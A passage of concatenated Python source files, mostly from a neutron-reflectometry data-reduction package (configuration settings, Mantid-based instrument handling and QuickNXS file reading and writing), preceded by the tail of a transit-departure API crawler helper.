'itdTime' : itdTime,
'limit' : 50,
'mode' : "direct",
'name_dm' : "de:8111:{}".format(self.convert_station_id(station)),
'outputFormat' : "rapidJSON",
'serverInfo' : "1",
'type_dm' : "any",
'useRealtime' : "1",
'version' : "10.2.2.48"
}
def function_to_call( self, results ):
"""
function that gets called on an api response
@param results: queue object of the api that contains result dicts from
the api call.
{
'timestamp': gmtime object -> when was the api call made
'name': api's name (id),
'station': station id,
'results': crawl results -> what came back from api
}
"""
results.put(None)
converted_results = []
for r in iter(results.get, None):
station = {}
current_dict = {}
station[r['station']] = [current_dict]
current_dict['timestamp'] = strftime('%Y-%m-%dT%H:%M:%SZ', r['timestamp']) # "2017-04-14 TEST"
current_dict['lines'] = {}
if not 'results' in r or not 'stopEvents' in r['results']:
continue
stop_events = filter(lambda elem:
elem['transportation']['product']['name']
== 'S-Bahn', r['results']['stopEvents'])
for st_event in stop_events:
departure_dict = {}
# print st_event
if 'isRealtimeControlled' in st_event:
departure_dict['isRealtimeControlled'] = st_event['isRealtimeControlled']
else:
departure_dict['isRealtimeControlled'] = False
if 'isRealtimeControlled' in departure_dict and 'departureTimeEstimated' in st_event:
departure_dict['departureTimeEstimated'] = st_event['departureTimeEstimated']
# else:
# departure_dict['departureTimeEstimated'] = None
departure_dict['departureTimePlanned'] = st_event['departureTimePlanned']
if 'infos' in st_event:
departure_dict['infos'] = []
for i in range(len(st_event['infos'])):
info = {}
if 'content' in st_event['infos'][i]:
info['content'] = st_event['infos'][i]['content']
else:
info['content'] = ""
info['title'] = st_event['infos'][i]['title']
info['subtitle'] = st_event['infos'][i]['subtitle']
info['properties'] = st_event['infos'][i]['properties']
departure_dict['infos'].append(info)
line = st_event['transportation']['number']
departure_dict['name'] = st_event['transportation']['product']['name']
departure_dict['class'] = st_event['transportation']['product']['class']
if line in current_dict['lines']:
current_dict['lines'][line].append(departure_dict)
else:
current_dict['lines'][line] = [departure_dict]
converted_results.append(station)
# print "Results: "
# with open("results.json", 'w') as output:
# json.dump(converted_results, output, indent=4)
# pprint(converted_results)
return converted_results
```
#### File: crawler/crawlerhelpers/test_api.py
```python
class API_test(object):
"""testing API class"""
def __init__( self ):
self.name = 'TEST'
self.baseurl = 'https://127.0.0.1'
def convert_station_id( self, station_id ):
"""
convert station id that is given to the api specific
representation if necessary
@param station_id: id in general representation
@return id in api specific representation
"""
return station_id
def get_name( self ):
"""
return default name for api
"""
return ''
def get_base_url( self ):
"""
return default basic url for api
"""
return ''
def get_params( self, current_time_raw, station ):
"""
@param current_time_raw: time as gmtime object
@param station: station id in general representation
@return dict with key value pairs for api parameters
"""
return {
'test': 'test'
}
def function_to_call( self, results ):
"""
function that gets called on an api response
@param results: queue object of the api that contains result dicts from
the api call.
{
'timestamp': gmtime object -> when was the api call made
'name': api's name (id),
'station': station id,
'results': crawl results -> what came back from api
}
"""
results.put(None)
converted_results = []
for r in iter(results.get, None):
pass
```
|
{
"source": "jenest/reflectivity_ui",
"score": 2
}
|
#### File: reflectivity_ui/interfaces/configuration.py
```python
from __future__ import absolute_import, division, print_function
import sys
import logging
from .data_handling.instrument import Instrument
class Configuration(object):
"""
Hold reduction options
"""
# Choice of axes for off-specular binning
QX_VS_QZ = 0
KZI_VS_KZF = 1
DELTA_KZ_VS_QZ = 3
def __init__(self, settings=None):
self.instrument = Instrument()
# Number of TOF bins
self.tof_bins = 400
self.tof_range = [0,0]
# Bin type:
# 0 = Constant bin width
# 1 = Constant Q bin width
# 2 = Constant 1/wavelength bin width
self.tof_bin_type = 0
self.wl_bandwidth = 3.2
# Threshold under which we skip a cross-section, as fraction of the max count
self.count_threshold = 0.01
self.tof_overwrite = None
# Reduction parameters
# Use region of interest specified in meta data
self.use_roi = True
self.set_direct_pixel = False
self.direct_pixel_overwrite = 0
self.set_direct_angle_offset = False
self.direct_angle_offset_overwrite = 0
self.use_dangle = False
self.use_constant_q = False
self.sample_size = 10
# Update the specular peak range after finding the peak
# within the ROI
self.update_peak_range = False
# Use background specified in the meta data, if available
self.use_roi_bck = False
self.use_tight_bck = False
self.bck_offset = 5
# Options to override the range
self.force_peak_roi = False
self.peak_position = 130
self.peak_width = 20
self.force_low_res_roi = False
self.low_res_position = 130
self.low_res_width = 20
self.force_bck_roi = False
self.bck_position = 30
self.bck_width = 20
# Subtract background
self.subtract_background = True
# Overall scaling factor
self.scaling_factor = 1.0
# Normalize to unity when stitching
self.normalize_to_unity = True
self.total_reflectivity_q_cutoff = 0.01
# Cut first and last N points
self.cut_first_n_points = 1
self.cut_last_n_points = 1
# Final Q rebin
self.do_final_rebin = True
self.final_rebin_step = -0.01
# UI elements
self.normalize_x_tof = False
self.x_wl_map = False
self.angle_map = False
self.log_1d = True
self.log_2d = True
# Off-specular options
self.off_spec_x_axis = Configuration.DELTA_KZ_VS_QZ
self.off_spec_slice = False
self.off_spec_qz_list = []
self.off_spec_slice_qz_min = 0.05
self.off_spec_slice_qz_max = 0.07
self.off_spec_err_weight = False
self.off_spec_nxbins = 450
self.off_spec_nybins = 200
# Off-specular smoothing
self.apply_smoothing = False
self.off_spec_sigmas = 3
self.off_spec_sigmax = 0.0005
self.off_spec_sigmay = 0.0005
self.off_spec_x_min = -0.015
self.off_spec_x_max = 0.015
self.off_spec_y_min = 0.0
self.off_spec_y_max = 0.15
# GISANS options
self.gisans_wl_min = 2.0
self.gisans_wl_max = 8.0
self.gisans_wl_npts = 2
self.gisans_qy_npts = 50
self.gisans_qz_npts = 50
self.gisans_use_pf = False
# Reduction options
self.match_direct_beam = False
self.normalization = None
if settings is not None:
try:
self.from_q_settings(settings)
except:
logging.error("Could not process application settings\n %s", sys.exc_value)
@property
def peak_roi(self):
peak_min = int(round(float(self.peak_position) - float(self.peak_width)/2.0))
peak_max = int(round(float(self.peak_position) + float(self.peak_width)/2.0+1.0))
return [peak_min, peak_max]
@peak_roi.setter
def peak_roi(self, value):
self.peak_position = (value[1] + value[0] - 1.0) / 2.0
self.peak_width = value[1] - value[0] - 1.0
@property
def low_res_roi(self):
peak_min = int(round(float(self.low_res_position) - float(self.low_res_width)/2.0))
peak_max = int(round(float(self.low_res_position) + float(self.low_res_width)/2.0+1.0))
return [peak_min, peak_max]
@low_res_roi.setter
def low_res_roi(self, value):
self.low_res_position = (value[1] + value[0] - 1.0) / 2.0
self.low_res_width = value[1] - value[0] - 1.0
@property
def bck_roi(self):
peak_min = int(round(float(self.bck_position) - float(self.bck_width)/2.0))
peak_max = int(round(float(self.bck_position) + float(self.bck_width)/2.0+1.0))
return [peak_min, peak_max]
@bck_roi.setter
def bck_roi(self, value):
self.bck_position = (value[1] + value[0]) / 2.0
self.bck_width = value[1] - value[0] + 1
def to_q_settings(self, settings):
"""
Save configuration to QSettings
:param settings QSettings: QSettings object
"""
settings.setValue('use_roi', self.use_roi)
settings.setValue('tof_bins', self.tof_bins)
settings.setValue('tof_range', ','.join([str(x) for x in self.tof_range]))
settings.setValue('tof_bin_type', self.tof_bin_type)
settings.setValue('update_peak_range', self.update_peak_range)
settings.setValue('use_roi_bck', self.use_roi_bck)
settings.setValue('use_tight_bck', self.use_tight_bck)
settings.setValue('bck_offset', self.bck_offset)
settings.setValue('wl_bandwidth', self.wl_bandwidth)
settings.setValue('force_peak_roi', self.force_peak_roi)
settings.setValue('peak_roi', ','.join([str(x) for x in self.peak_roi]))
settings.setValue('force_low_res_roi', self.force_low_res_roi)
settings.setValue('low_res_roi', ','.join([str(x) for x in self.low_res_roi]))
settings.setValue('force_bck_roi', self.force_bck_roi)
settings.setValue('bck_roi', ','.join([str(x) for x in self.bck_roi]))
settings.setValue('subtract_background', self.subtract_background)
settings.setValue('scaling_factor', self.scaling_factor)
settings.setValue('cut_first_n_points', self.cut_first_n_points)
settings.setValue('cut_last_n_points', self.cut_last_n_points)
# Normalize to unity when stitching
settings.setValue('normalize_to_unity', self.normalize_to_unity)
settings.setValue('total_reflectivity_q_cutoff', self.total_reflectivity_q_cutoff)
settings.setValue('normalize_x_tof', self.normalize_x_tof)
settings.setValue('x_wl_map', self.x_wl_map)
settings.setValue('angle_map', self.angle_map)
settings.setValue('log_1d', self.log_1d)
settings.setValue('log_2d', self.log_2d)
settings.setValue('use_constant_q', self.use_constant_q)
settings.setValue('use_dangle', self.use_dangle)
settings.setValue('set_direct_pixel', self.set_direct_pixel)
settings.setValue('direct_pixel_overwrite', self.direct_pixel_overwrite)
settings.setValue('set_direct_angle_offset', self.set_direct_angle_offset)
settings.setValue('direct_angle_offset_overwrite', self.direct_angle_offset_overwrite)
settings.setValue('sample_size', self.sample_size)
settings.setValue('do_final_rebin', self.do_final_rebin)
settings.setValue('final_rebin_step', self.final_rebin_step)
# Off-specular options
settings.setValue('off_spec_x_axis', self.off_spec_x_axis)
settings.setValue('off_spec_slice', self.off_spec_slice)
settings.setValue('off_spec_qz_list', ','.join([str(x) for x in self.off_spec_qz_list]))
settings.setValue('off_spec_err_weight', self.off_spec_err_weight)
settings.setValue('off_spec_nxbins', self.off_spec_nxbins)
settings.setValue('off_spec_nybins', self.off_spec_nybins)
settings.setValue('off_spec_slice_qz_min', self.off_spec_slice_qz_min)
settings.setValue('off_spec_slice_qz_max', self.off_spec_slice_qz_max)
# Off-specular smoothing
settings.setValue('apply_smoothing', self.apply_smoothing)
settings.setValue('off_spec_sigmas', self.off_spec_sigmas)
settings.setValue('off_spec_sigmax', self.off_spec_sigmax)
settings.setValue('off_spec_sigmay', self.off_spec_sigmay)
settings.setValue('off_spec_x_min', self.off_spec_x_min)
settings.setValue('off_spec_x_max', self.off_spec_x_max)
settings.setValue('off_spec_y_min', self.off_spec_y_min)
settings.setValue('off_spec_y_max', self.off_spec_y_max)
# GISANS options
settings.setValue('gisans_wl_min', self.gisans_wl_min)
settings.setValue('gisans_wl_max', self.gisans_wl_max)
settings.setValue('gisans_wl_npts', self.gisans_wl_npts)
settings.setValue('gisans_qy_npts', self.gisans_qy_npts)
settings.setValue('gisans_qz_npts', self.gisans_qz_npts)
settings.setValue('gisans_use_pf', self.gisans_use_pf)
def from_q_settings(self, settings):
""" Retrieve configuration from QSettings """
def _verify_true(parameter, default):
""" Utility function to read a bool """
_value = settings.value(parameter, str(default))
return str(_value).lower() == 'true'
self.use_roi = _verify_true('use_roi', self.use_roi)
#self.tof_bins = int(settings.value('tof_bins', self.tof_bins))
self.tof_range = [float(x) for x in settings.value('tof_range', [0,0]).split(',')]
self.tof_bin_type = int(settings.value('tof_bin_type', self.tof_bin_type))
self.update_peak_range = _verify_true('update_peak_range', self.update_peak_range)
self.use_roi_bck = _verify_true('use_roi_bck', self.use_roi_bck)
self.use_tight_bck = _verify_true('use_tight_bck', self.use_tight_bck)
self.bck_offset = int(settings.value('bck_offset', self.bck_offset))
self.wl_bandwidth = float(settings.value('wl_bandwidth', self.wl_bandwidth))
self.force_peak_roi = _verify_true('force_peak_roi', self.force_peak_roi)
self.force_low_res_roi = _verify_true('force_low_res_roi', self.force_low_res_roi)
self.force_bck_roi = _verify_true('force_bck_roi', self.force_bck_roi)
default = ','.join([str(x) for x in self.peak_roi])
self.peak_roi = [int(x) for x in settings.value('peak_roi', default).split(',')]
default = ','.join([str(x) for x in self.low_res_roi])
self.low_res_roi = [int(x) for x in settings.value('low_res_roi', default).split(',')]
default = ','.join([str(x) for x in self.bck_roi])
self.bck_roi = [int(x) for x in settings.value('bck_roi', default).split(',')]
self.subtract_background = _verify_true('subtract_background', self.subtract_background)
self.scaling_factor = float(settings.value('scaling_factor', self.scaling_factor))
self.cut_first_n_points = int(settings.value('cut_first_n_points', self.cut_first_n_points))
self.cut_last_n_points = int(settings.value('cut_last_n_points', self.cut_last_n_points))
# Normalize to unity when stitching
self.normalize_to_unity = _verify_true('normalize_to_unity', self.normalize_to_unity)
self.total_reflectivity_q_cutoff = float(settings.value('total_reflectivity_q_cutoff', self.total_reflectivity_q_cutoff))
self.normalize_x_tof = _verify_true('normalize_x_tof', self.normalize_x_tof)
self.x_wl_map = _verify_true('x_wl_map', self.x_wl_map)
self.angle_map = _verify_true('angle_map', self.angle_map)
self.log_1d = _verify_true('log_1d', self.log_1d)
self.log_2d = _verify_true('log_2d', self.log_2d)
self.use_constant_q = _verify_true('use_constant_q', self.use_constant_q)
self.use_dangle = _verify_true('use_dangle', self.use_dangle)
self.set_direct_pixel = _verify_true('set_direct_pixel', self.set_direct_pixel)
self.direct_pixel_overwrite = float(settings.value('direct_pixel_overwrite', self.direct_pixel_overwrite))
self.set_direct_angle_offset = _verify_true('set_direct_angle_offset', self.set_direct_angle_offset)
self.direct_angle_offset_overwrite = float(settings.value('direct_angle_offset_overwrite', self.direct_angle_offset_overwrite))
self.sample_size = float(settings.value('sample_size', self.sample_size))
self.do_final_rebin = _verify_true('do_final_rebin', self.do_final_rebin)
self.final_rebin_step = float(settings.value('final_rebin_step', self.final_rebin_step))
# Off-specular options
self.off_spec_x_axis = int(settings.value('off_spec_x_axis', self.off_spec_x_axis))
self.off_spec_slice = _verify_true('off_spec_slice', self.off_spec_slice)
default = ','.join([str(x) for x in self.off_spec_qz_list])
try:
self.off_spec_qz_list = [float(x) for x in settings.value('off_spec_qz_list', default).split(',')]
except:
self.off_spec_qz_list = []
self.off_spec_err_weight = _verify_true('off_spec_err_weight', self.off_spec_err_weight)
self.off_spec_nxbins = int(settings.value('off_spec_nxbins', self.off_spec_nxbins))
self.off_spec_nybins = int(settings.value('off_spec_nybins', self.off_spec_nybins))
self.off_spec_slice_qz_min = float(settings.value('off_spec_slice_qz_min', self.off_spec_slice_qz_min))
self.off_spec_slice_qz_max = float(settings.value('off_spec_slice_qz_max', self.off_spec_slice_qz_max))
# Off-specular smoothing
self.apply_smoothing = _verify_true('apply_smoothing', self.apply_smoothing)
self.off_spec_sigmas = int(settings.value('off_spec_sigmas', self.off_spec_sigmas))
self.off_spec_sigmax = float(settings.value('off_spec_sigmax', self.off_spec_sigmax))
self.off_spec_sigmay = float(settings.value('off_spec_sigmay', self.off_spec_sigmay))
self.off_spec_x_min = float(settings.value('off_spec_x_min', self.off_spec_x_min))
self.off_spec_x_max = float(settings.value('off_spec_x_max', self.off_spec_x_max))
self.off_spec_y_min = float(settings.value('off_spec_y_min', self.off_spec_y_min))
self.off_spec_y_max = float(settings.value('off_spec_y_max', self.off_spec_y_max))
# GISANS options
self.gisans_wl_min = float(settings.value('gisans_wl_min', self.gisans_wl_min))
self.gisans_wl_max = float(settings.value('gisans_wl_max', self.gisans_wl_max))
self.gisans_wl_npts = int(settings.value('gisans_wl_npts', self.gisans_wl_npts))
self.gisans_qy_npts = int(settings.value('gisans_qy_npts', self.gisans_qy_npts))
self.gisans_qz_npts = int(settings.value('gisans_qz_npts', self.gisans_qz_npts))
self.gisans_use_pf = _verify_true('gisans_use_pf', self.gisans_use_pf)
```
#### File: interfaces/data_handling/instrument.py
```python
from __future__ import absolute_import, division, print_function
import sys
import os
import math
import logging
import numpy as np
# Import mantid according to the application configuration
from . import ApplicationConfiguration
application_conf = ApplicationConfiguration()
sys.path.insert(0, application_conf.mantid_path)
import mantid.simpleapi as api
# Option to use the slow flipper logs rather than the Analyzer/Polarizer logs
USE_SLOW_FLIPPER_LOG = True
# Constants
h = 6.626e-34 # m^2 kg s^-1
m = 1.675e-27 # kg
def get_cross_section_label(ws, entry_name):
"""
Return the proper cross-section label.
"""
entry_name = str(entry_name)
pol_is_on = entry_name.lower().startswith('on')
ana_is_on = entry_name.lower().endswith('on')
pol_label = ''
ana_label = ''
# Look for log that define whether OFF or ON is +
if 'PolarizerLabel' in ws.getRun():
pol_id = ws.getRun().getProperty("PolarizerLabel").value
if isinstance(pol_id, np.ndarray):
pol_id = int(pol_id[0])
if pol_id == 1:
pol_label = '+' if pol_is_on else '-'
elif pol_id == 0:
pol_label = '-' if pol_is_on else '+'
if 'AnalyzerLabel' in ws.getRun():
ana_id = ws.getRun().getProperty("AnalyzerLabel").value
if isinstance(ana_id, np.ndarray):
ana_id = int(ana_id[0])
if ana_id == 1:
ana_label = '+' if ana_is_on else '-'
elif ana_id == 0:
ana_label = '-' if ana_is_on else '-'
entry_name = entry_name.replace('_', '-')
if ana_label == '' and pol_label == '':
return entry_name
else:
return '%s%s' % (pol_label, ana_label)
class Instrument(object):
"""
Instrument class. Holds the data handling that is unique to a specific instrument.
"""
n_x_pixel = 304
n_y_pixel = 256
huber_x_cut = 6.5
peak_range_offset = 50
tolerance = 0.05
pixel_width = 0.0007
instrument_name = "REF_M"
instrument_dir = "/SNS/REF_M"
file_search_template = "/SNS/REF_M/*/nexus/REF_M_%s"
legacy_search_template = "/SNS/REF_M/*/data/REF_M_%s"
def __init__(self):
# Filtering
self.pol_state = application_conf.POL_STATE
self.pol_veto = application_conf.POL_VETO
self.ana_state = application_conf.ANA_STATE
self.ana_veto = application_conf.ANA_VETO
def dummy_filter_cross_sections(self, ws):
"""
Filter events according to an aggregated state log.
:param str file_path: file to read
BL4A:SF:ICP:getDI
015 (0000 1111): SF1=OFF, SF2=OFF, SF1Veto=OFF, SF2Veto=OFF
047 (0010 1111): SF1=ON, SF2=OFF, SF1Veto=OFF, SF2Veto=OFF
031 (0001 1111): SF1=OFF, SF2=ON, SF1Veto=OFF, SF2Veto=OFF
063 (0011 1111): SF1=ON, SF2=ON, SF1Veto=OFF, SF2Veto=OFF
"""
state_log = "BL4A:SF:ICP:getDI"
states = {'Off_Off': 15,
'On_Off': 47,
'Off_On': 31,
'On_On': 63}
cross_sections = []
for pol_state in ['Off_Off', 'On_On', 'Off_On', 'On_Off']:
try:
_ws = api.FilterByLogValue(InputWorkspace=ws, LogName=state_log, TimeTolerance=0.1,
MinimumValue=states[pol_state],
MaximumValue=states[pol_state], LogBoundary='Left',
OutputWorkspace='%s_entry-%s' % (ws.getRunNumber(), pol_state))
_ws.getRun()['cross_section_id'] = pol_state
cross_sections.append(_ws)
except:
logging.error("Could not filter %s: %s", pol_state, sys.exc_info()[1])
return cross_sections
def load_data(self, file_path):
"""
Load a data set according to the needs ot the instrument.
Returns a WorkspaceGroup with any number of cross-sections.
:param str file_path: path to the data file
"""
# Be careful with legacy data
is_legacy = file_path.endswith(".nxs")
if is_legacy or not USE_SLOW_FLIPPER_LOG:
base_name = os.path.basename(file_path)
_xs_list = api.MRFilterCrossSections(Filename=file_path,
PolState=self.pol_state,
AnaState=self.ana_state,
PolVeto=self.pol_veto,
AnaVeto=self.ana_veto,
CrossSectionWorkspaces="%s_entry" % base_name)
# Only keep good workspaced and get rid of the rejected events
xs_list = [ws for ws in _xs_list if not ws.getRun()['cross_section_id'].value == 'unfiltered']
else:
ws = api.LoadEventNexus(Filename=file_path, OutputWorkspace="raw_events")
xs_list = self.dummy_filter_cross_sections(ws)
return xs_list
@classmethod
def mid_q_value(cls, ws):
"""
Get the mid q value, at the requested wl mid-point.
This is used when sorting out data sets and doesn't need any overwrites.
:param workspace ws: Mantid workspace
"""
wl = ws.getRun().getProperty('LambdaRequest').value[0]
theta_d = api.MRGetTheta(ws)
return 4.0*math.pi*math.sin(theta_d) / wl
@classmethod
def scattering_angle_from_data(cls, data_object):
"""
Compute the scattering angle from a CrossSectionData object, in degrees.
@param data_object: CrossSectionData object
"""
_dirpix = data_object.configuration.direct_pixel_overwrite if data_object.configuration.set_direct_pixel else None
_dangle0 = data_object.configuration.direct_angle_offset_overwrite if data_object.configuration.set_direct_angle_offset else None
return api.MRGetTheta(data_object.event_workspace,
SpecularPixel=data_object.configuration.peak_position,
DAngle0Overwrite=_dangle0,
DirectPixelOverwrite=_dirpix) * 180.0 / math.pi
@classmethod
def check_direct_beam(cls, ws):
"""
Determine whether this data is a direct beam
"""
try:
return ws.getRun().getProperty("data_type").value[0] == 1
except:
return False
def direct_beam_match(self, scattering, direct_beam, skip_slits=False):
"""
Verify whether two data sets are compatible.
"""
if math.fabs(scattering.lambda_center-direct_beam.lambda_center) < self.tolerance \
and (skip_slits or \
(math.fabs(scattering.slit1_width-direct_beam.slit1_width) < self.tolerance \
and math.fabs(scattering.slit2_width-direct_beam.slit2_width) < self.tolerance \
and math.fabs(scattering.slit3_width-direct_beam.slit3_width) < self.tolerance)):
return True
return False
@classmethod
def get_info(cls, workspace, data_object):
"""
Retrieve information that is specific to this particular instrument
@param workspace: Mantid workspace
@param data_object: CrossSectionData object
"""
data = workspace.getRun()
data_object.lambda_center = data['LambdaRequest'].value[0]
data_object.dangle = data['DANGLE'].getStatistics().mean
if 'BL4A:Mot:S1:X:Gap' in data:
data_object.slit1_width = data['BL4A:Mot:S1:X:Gap'].value[0]
data_object.slit2_width = data['BL4A:Mot:S2:X:Gap'].value[0]
data_object.slit3_width = data['BL4A:Mot:S3:X:Gap'].value[0]
else:
data_object.slit1_width = data['S1HWidth'].value[0]
data_object.slit2_width = data['S2HWidth'].value[0]
data_object.slit3_width = data['S3HWidth'].value[0]
data_object.huber_x = data['HuberX'].getStatistics().mean
data_object.sangle = data['SANGLE'].getStatistics().mean
data_object.dist_sam_det = data['SampleDetDis'].value[0]*1e-3
data_object.dist_mod_det = data['ModeratorSamDis'].value[0]*1e-3+data_object.dist_sam_det
data_object.dist_mod_mon = data['ModeratorSamDis'].value[0]*1e-3-2.75
# Get these from instrument
data_object.pixel_width = float(workspace.getInstrument().getNumberParameter("pixel-width")[0]) / 1000.0
data_object.n_det_size_x = int(workspace.getInstrument().getNumberParameter("number-of-x-pixels")[0]) # 304
data_object.n_det_size_y = int(workspace.getInstrument().getNumberParameter("number-of-y-pixels")[0]) # 256
data_object.det_size_x = data_object.n_det_size_x * data_object.pixel_width # horizontal size of detector [m]
data_object.det_size_y = data_object.n_det_size_y * data_object.pixel_width # vertical size of detector [m]
# The following active area used to be taken from instrument.DETECTOR_REGION
data_object.active_area_x = (8, 295)
data_object.active_area_y = (8, 246)
# Convert to standard names
data_object.direct_pixel = data['DIRPIX'].getStatistics().mean
data_object.angle_offset = data['DANGLE0'].getStatistics().mean
# Get proper cross-section label
data_object.cross_section_label = get_cross_section_label(workspace, data_object.entry_name)
try:
data_object.is_direct_beam = data["data_type"].value[0] == 1
except:
data_object.is_direct_beam = False
def integrate_detector(self, ws, specular=True):
"""
Integrate a workspace along either the main direction (specular=False) or
the low-resolution direction (specular=True.
:param ws: Mantid workspace
:param specular bool: if True, the low-resolution direction is integrated over
"""
ws_summed = api.RefRoi(InputWorkspace=ws, IntegrateY=specular,
NXPixel=self.n_x_pixel, NYPixel=self.n_y_pixel,
ConvertToQ=False,
OutputWorkspace="ws_summed")
integrated = api.Integration(ws_summed)
integrated = api.Transpose(integrated)
return integrated
```
#### File: interfaces/data_handling/quicknxs_io.py
```python
from __future__ import absolute_import, division, print_function
import sys
import os
import time
import copy
import math
import logging
import numpy as np
# Import mantid according to the application configuration
from . import ApplicationConfiguration
APP_CONF = ApplicationConfiguration()
sys.path.insert(0, APP_CONF.mantid_path)
import mantid
from ... import __version__
from ..configuration import Configuration
def _find_h5_data(filename):
"""
Because we have legacy data and new data re-processed for QuickNXS, we have to
ensure that we get the proper data file.
"""
if filename.endswith('.nxs'):
_new_filename = filename.replace('_histo.nxs', '.nxs.h5')
_new_filename = _new_filename.replace('_event.nxs', '.nxs.h5')
_new_filename = _new_filename.replace('data', 'nexus')
if os.path.isfile(_new_filename):
logging.warning("Using %s" % _new_filename)
return _new_filename
return filename
def write_reflectivity_header(reduction_list, direct_beam_list, output_path, pol_states):
"""
Write out reflectivity header in a format readable by QuickNXS
:param str output_path: output file path
:param str pol_states: descriptor for the polarization state
"""
# Sanity check
if not reduction_list:
return
direct_beam_options = ['DB_ID', 'P0', 'PN', 'x_pos', 'x_width', 'y_pos', 'y_width',
'bg_pos', 'bg_width', 'dpix', 'tth', 'number', 'File']
dataset_options = ['scale', 'P0', 'PN', 'x_pos', 'x_width', 'y_pos', 'y_width',
'bg_pos', 'bg_width', 'fan', 'dpix', 'tth', 'number', 'DB_ID', 'File']
fd = open(output_path, 'w')
fd.write("# Datafile created by QuickNXS %s\n" % __version__)
fd.write("# Datafile created using Mantid %s\n" % mantid.__version__)
fd.write("# Date: %s\n" % time.strftime(u"%Y-%m-%d %H:%M:%S"))
fd.write("# Type: Specular\n")
run_list = [str(item.number) for item in reduction_list]
fd.write("# Input file indices: %s\n" % ','.join(run_list))
fd.write("# Extracted states: %s\n" % pol_states)
fd.write("#\n")
fd.write("# [Direct Beam Runs]\n")
toks = ['%8s' % item for item in direct_beam_options]
fd.write("# %s\n" % ' '.join(toks))
# Get the list of cross-sections
pol_list = reduction_list[0].cross_sections.keys()
if not pol_list:
logging.error("No data found in run %s", reduction_list[0].number)
return
# Direct beam section
i_direct_beam = 0
for data_set in reduction_list:
run_object = data_set.cross_sections[pol_list[0]].reflectivity_workspace.getRun()
normalization_run = run_object.getProperty("normalization_run").value
if normalization_run == "None":
continue
direct_beam = None
for db_i in direct_beam_list:
if str(db_i.number) == str(normalization_run):
direct_beam = db_i
if direct_beam is None:
continue
db_pol = direct_beam.cross_sections.keys()[0]
conf = direct_beam.cross_sections[db_pol].configuration
i_direct_beam += 1
dpix = run_object.getProperty("normalization_dirpix").value
filename = run_object.getProperty("normalization_file_path").value
item = dict(DB_ID=i_direct_beam, tth=0, P0=0, PN=0,
x_pos=conf.peak_position,
x_width=conf.peak_width,
y_pos=conf.low_res_position,
y_width=conf.low_res_width,
bg_pos=conf.bck_position,
bg_width=conf.bck_width,
dpix=dpix,
number=normalization_run,
File=filename)
par_list = ['{%s}' % p for p in direct_beam_options]
template = "# %s\n" % ' '.join(par_list)
_clean_dict = {}
for key in item:
if isinstance(item[key], (bool, str)):
_clean_dict[key] = "%8s" % item[key]
else:
_clean_dict[key] = "%8g" % item[key]
fd.write(template.format(**_clean_dict))
# Scattering data
fd.write("#\n")
fd.write("# [Data Runs]\n")
toks = ['%8s' % item for item in dataset_options]
fd.write("# %s\n" % ' '.join(toks))
i_direct_beam = 0
conf = None
for data_set in reduction_list:
conf = data_set.cross_sections[pol_list[0]].configuration
ws = data_set.cross_sections[pol_list[0]].reflectivity_workspace
run_object = ws.getRun()
dpix = run_object.getProperty("DIRPIX").getStatistics().mean
filename = run_object.getProperty("Filename").value
constant_q_binning = run_object.getProperty("constant_q_binning").value
scatt_pos = run_object.getProperty("specular_pixel").value
scaling_factor = conf.scaling_factor
# For some reason, the tth value that QuickNXS expects is offset.
# It seems to be because that same offset is applied later in the QuickNXS calculation.
# Correct tth here so that it can load properly in QuickNXS and produce the same result.
tth = run_object.getProperty("two_theta").value
det_distance = run_object['SampleDetDis'].getStatistics().mean / 1000.0
direct_beam_pix = run_object['DIRPIX'].getStatistics().mean
# Get pixel size from instrument properties
if ws.getInstrument().hasParameter("pixel-width"):
pixel_width = float(ws.getInstrument().getNumberParameter("pixel-width")[0]) / 1000.0
else:
pixel_width = 0.0007
tth -= ((direct_beam_pix - scatt_pos) * pixel_width) / det_distance * 180.0 / math.pi
normalization_run = run_object.getProperty("normalization_run").value
if normalization_run == "None":
db_id = 0
else:
i_direct_beam += 1
db_id = i_direct_beam
item = dict(scale=scaling_factor, DB_ID=db_id,
P0=conf.cut_first_n_points, PN=conf.cut_last_n_points, tth=tth,
fan=constant_q_binning,
x_pos=conf.peak_position,
x_width=conf.peak_width,
y_pos=conf.low_res_position,
y_width=conf.low_res_width,
bg_pos=conf.bck_position,
bg_width=conf.bck_width,
dpix=dpix,
number=str(ws.getRunNumber()),
File=filename)
par_list = ['{%s}' % p for p in dataset_options]
template = "# %s\n" % ' '.join(par_list)
_clean_dict = {}
for key in item:
if isinstance(item[key], str):
_clean_dict[key] = "%8s" % item[key]
else:
_clean_dict[key] = "%8g" % item[key]
fd.write(template.format(**_clean_dict))
fd.write("#\n")
fd.write("# [Global Options]\n")
fd.write("# name value\n")
sample_size = 10 if conf is None else conf.sample_size
fd.write("# sample_length %s\n" % str(sample_size))
fd.write("#\n")
fd.close()
def write_reflectivity_data(output_path, data, col_names, as_5col=True):
"""
Write out reflectivity header in a format readable by QuickNXS
:param str output_path: output file path
:param ndarray or list data: data to be written
:param list col_names: list of column names
:param bool as_5col: if True, a 5-column ascii will be written (theta is the last column)
"""
with open(output_path, 'a') as fd:
# Determine how many columns to write
if isinstance(data, list):
four_cols = True
else:
four_cols = not as_5col and data.shape[1] > 4
fd.write("# [Data]\n")
if four_cols:
toks = [u'%12s' % item for item in col_names[:4]]
else:
toks = [u'%12s' % item for item in col_names]
fd.write(u"# %s\n" % '\t'.join(toks))
if isinstance(data, list):
# [TOF][pixel][parameter]
for tof_item in data:
for pixel_item in tof_item:
np.savetxt(fd, pixel_item, delimiter='\t', fmt='%-18e')
fd.write(u'\n'.encode('utf8'))
else:
if four_cols:
np.savetxt(fd, data[:, :4], delimiter=' ', fmt='%-18e')
else:
np.savetxt(fd, data, delimiter='\t', fmt='%-18e')
def read_reduced_file(file_path, configuration=None):
"""
Read in configurations from a reduced data file.
:param str file_path: reduced data file
"""
direct_beam_runs = []
data_runs = []
with open(file_path, 'r') as file_content:
# Section identifier
# 0: None
# 1: direct beams
# 2: data runs
# 3: global options
_in_section = 0
_file_start = True
for line in file_content.readlines():
if _file_start and not line.startswith("# Datafile created by QuickNXS"):
raise RuntimeError("The selected file does not conform to the QuickNXS format")
_file_start = False
if "[Direct Beam Runs]" in line:
_in_section = 1
elif "[Data Runs]" in line:
_in_section = 2
elif "[Global Options]" in line:
_in_section = 3
# Process direct beam runs
if _in_section == 1:
toks = line.split()
if len(toks) < 14 or 'DB_ID' in line:
continue
try:
if configuration is not None:
conf = copy.deepcopy(configuration)
else:
conf = Configuration()
conf.cut_first_n_points = int(toks[2])
conf.cut_last_n_points = int(toks[3])
conf.peak_position = float(toks[4])
conf.peak_width = float(toks[5])
conf.low_res_position = float(toks[6])
conf.low_res_width = float(toks[7])
